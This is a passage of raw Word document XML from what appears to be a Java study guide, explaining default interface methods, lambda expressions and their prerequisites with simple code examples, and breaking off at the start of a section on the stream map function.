    <w:p w14:paraId="336739A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t: " + calculator.multiply(5, 3)); // Output: Product: 15</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1BE51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30248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F731D4"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663F6E7A"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abstract method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, and it is implemented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2A7E1DB5"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tra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y</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ith default implementations, so they are automatically available to any class that implements the Calculator interface (including the lambda expression used here).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434664FF"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efault Methods Are Useful:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9D65F9"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functionality to existing interfaces without breaking the implementing classes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775DEB67"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Default methods allow for code reuse across different implementing classes, which can help reduce code duplication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="691CC8A0"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Interface Pollution</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Instead of creating a new interface with only one method to introduce new behavior, you can add a default method to the existing interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104985DC"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Considerations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0F354"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does not change the core behavior of a functional interface. It just provides an optional implementation that classes can use or override.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA3D661"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conflicting default methods (i.e., methods with the same signature), the implementing class will need to explicitly override the method and resolve the conflict.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0463FA45"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A84D0EF"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84" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7073D5" w14:textId="04E04D1E" w:rsidR="00AE2040" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE2040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="229" w:name="_Toc197867443"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is Lambda Expression?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="229"/>
    </w:p>
    <w:p w14:paraId="09F7E1BA" w14:textId="5EE9754B" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="0029714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n Java is a concise way to represent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a single abstract method) using an </w:t>
      </w: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xml:space="preserve"> rather than an </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>anonymous class</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Lambda expressions allow you to pass behavior (i.e., a method) as an argument to other methods or use it as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-class citizen</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in functional programming.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059B560B"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a Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3340A3B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 or block of code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4598C"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for the lambda expression (it can be one or more parameters, or no parameters).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7C3C0E"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t;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The arrow token separates the parameters from the body.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B18CA03"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or block of code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The body of the lambda expression. It can either be a single expression or a block of code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="310AC8A1"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5BFA5EE"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a lambda expression that adds two numbers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244D3BFB"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method in a class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4202DF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ition {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034810F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add(int a, int b) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EC002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273F784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640F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262EC6" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15DD37E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Lambda Expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62B54CF6"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056693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1003E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add two numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77729E5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unction addition = (a, b) -&gt; a + b;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03315F54" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1822C66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method</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0922095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ition.add(5, 3)); // Output: 8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79CCB6E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92930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1ED01A" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2822528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7C40FA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ddFunction {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47987B7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3FC648BF"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E1952A"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Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D24349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Syntax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions allow for more concise code as compared to anonymous class implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01015D05" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">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Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5A4117"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new Runnable() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7FD2A5" w14:textId="7D025D06"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BC0C744"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3DA94A31"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00ABA"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F83BA5"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Lambda</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7014D3A6"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6A0875AC"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Lambda expressions are intended to be used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that contain exactly one abstract method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619736C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Used for Functional Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Lambda expressions are a fundamental feature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allowing you to pass behavior as an argument and enabling operations lik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011C59D7"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Boilerplate Code</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: They reduce the need for writing full anonymous class implementations, which is especially useful in event handling or when passing functions as arguments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF4AC6"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s of Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD4543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arameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression that takes no parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EAF8F75"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unnable r = () -&gt; System.out.println("Hello, world!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F4E4D"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Parameter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression with a single parameter (the parentheses can be omitted).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0BAECC"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greet = name -&gt; System.out.println("Hello, " + name);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="473DA53F"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et.accept("Alice"); // Output: Hello, Alice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F93343"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Parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda expression with multiple parameters.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D304ED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514E0644"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39534F52"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Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda with a single expression.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C16D6D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square = x -&gt; x * x;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D4FC6"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apply(4)); // Output: 16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022A2BF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 Body</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A lambda with a block of code, typically when more than one statement is needed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E5255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increment = x -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FD6D540" w14:textId="6A8A7505"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x + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBFC3C7"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6AC686B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B7AD0"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ncrement.apply(5)); // Output: 6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68137778"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Lambda Expressions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDB24BD"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They eliminate boilerplate code like creating anonymous class implementations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D40F2"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xml:space="preserve">: Lambda expressions enable functional programming features, such as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5C517F65"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Maintainability</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With less code, there’s less chance of introducing bugs, and the code is easier to maintain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D912CB8"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Parallel Programming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Lambda expressions support easier parallelism with streams, allowing for more efficient processing of large data sets in parallel.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="056D5F52"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llection and Lambda Expression:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEE836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0C343CF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B12D5AC" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C9C057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7889B7B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599E0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Arrays.asList("John", "Alice", "Bob", "Charlie");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47105560" w14:textId="77777777" w:rsidR="00434D78" w:rsidRPr="00CE4B95" w:rsidRDefault="00434D78" w:rsidP="00297143">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58A80DC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terate through list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422482B3"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forEach(name -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB6E1D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030C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filter and print names starting with "A"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C16008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stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531E305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ame -&gt; name.startsWith("A"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4831BE38"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name -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375B35C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2BA9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155DC5"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5BB219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llow you to express </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>instances of single-method interfaces (functional interfaces)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in a much more concise and readable manner. They are widely used with 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85" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4B6470" w14:textId="2323BEB9" w:rsidR="00AE2040" w:rsidRPr="00CE4B95" w:rsidRDefault="00AE2040">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="230" w:name="_Toc197867444"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the prerequisite for Lambda Expression?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="230"/>
    </w:p>
    <w:p w14:paraId="1C3F74F5" w14:textId="33F77155" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70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effectively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you need to meet the following prerequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="497691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or Later</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64A971D4"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so you need to use Java 8 or a later version of Java to leverage lambda expressions. You can check your Java version with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5380B49F"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ersion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B9E13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al Interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F9008"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Lambda expressions are intended to work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hich are interfaces that have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 functional interface may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ut it must have only one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69555699"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 functional interface:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09E827AB"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A4676C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6C4892B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apply();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3730E360"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FA793"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which is optional but helps identify a functional interface and ensures the interface has only one abstract method.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471C9A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amiliarity with Functional Programming Concepts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F50C045" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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not a strict requirement, understanding the basics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an make using lambda expressions easier. Concepts like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>first-class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are foundational to lambda expressions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47ECF553"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nderstanding of Method References (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688C5E52" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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0BD1AC19"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System.out::println);  // Method reference instead of lambda expression</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05C3F6F4"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of Java's Standard Library Features</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E5A723" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>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ork extensively with Java's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 Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It’s helpful to be familiar with:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49C1E9"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For operations like map, filter, and reduce.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA0B31A"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Common functional interfaces in java.util.function package, such as:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1203D3C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p w14:paraId="37E018EA"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p w14:paraId="2B289583"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p w14:paraId="4EFC878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p w14:paraId="48E7FDB7"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T, U, R&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06FD2DC0"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rong Understanding of Anonymous Classes (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39D0D12D" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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fore Java 8,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n anonymous class:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596AA3F1"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6B2043E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ew Consumer&lt;String&gt;() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD97EE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pt(String name) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E58415"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31090D9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5C472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621A9EF"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 simplifies the above code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148113B6"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ame -&gt; System.out.println(name));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36DDF772"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nderstanding of Functional Programming in Java (Optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C6AB171" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="000B617F" w:rsidP="001A70EA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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s a style of programming that treats computation as the evaluation of mathematical functions and avoids changing-state and mutable data. Knowing concepts like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will help you to effectively use lambda expressions and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242644DF" w14:textId="77777777" w:rsidR="000B617F" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="001A70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6B022E">
          <v:rect id="_x0000_i1686" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2CEC8F"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erequisites:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357C2A14"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or higher</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77670C1E"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one abstract method).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4748C658"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of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>functional programming concepts</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEE0A17"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ndard library functional interfaces</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4005F251"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miliarity with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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2DDEB9"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Understanding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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC63C1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nce these prerequisites are met, you can start using lambda expressions to write more concise, flexible, and readable code in Java.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2514AE" w14:textId="3A95A16B"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87" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40760A5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31" w:name="_Toc197867445"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the map function in stream?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="231"/>
    </w:p>
    <w:p w14:paraId="3BABC654" w14:textId="7AE93A1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transformation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apply a function</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to each element in the stream, producing a new stream of transformed elements. It is a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for </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>mapping</w:t>
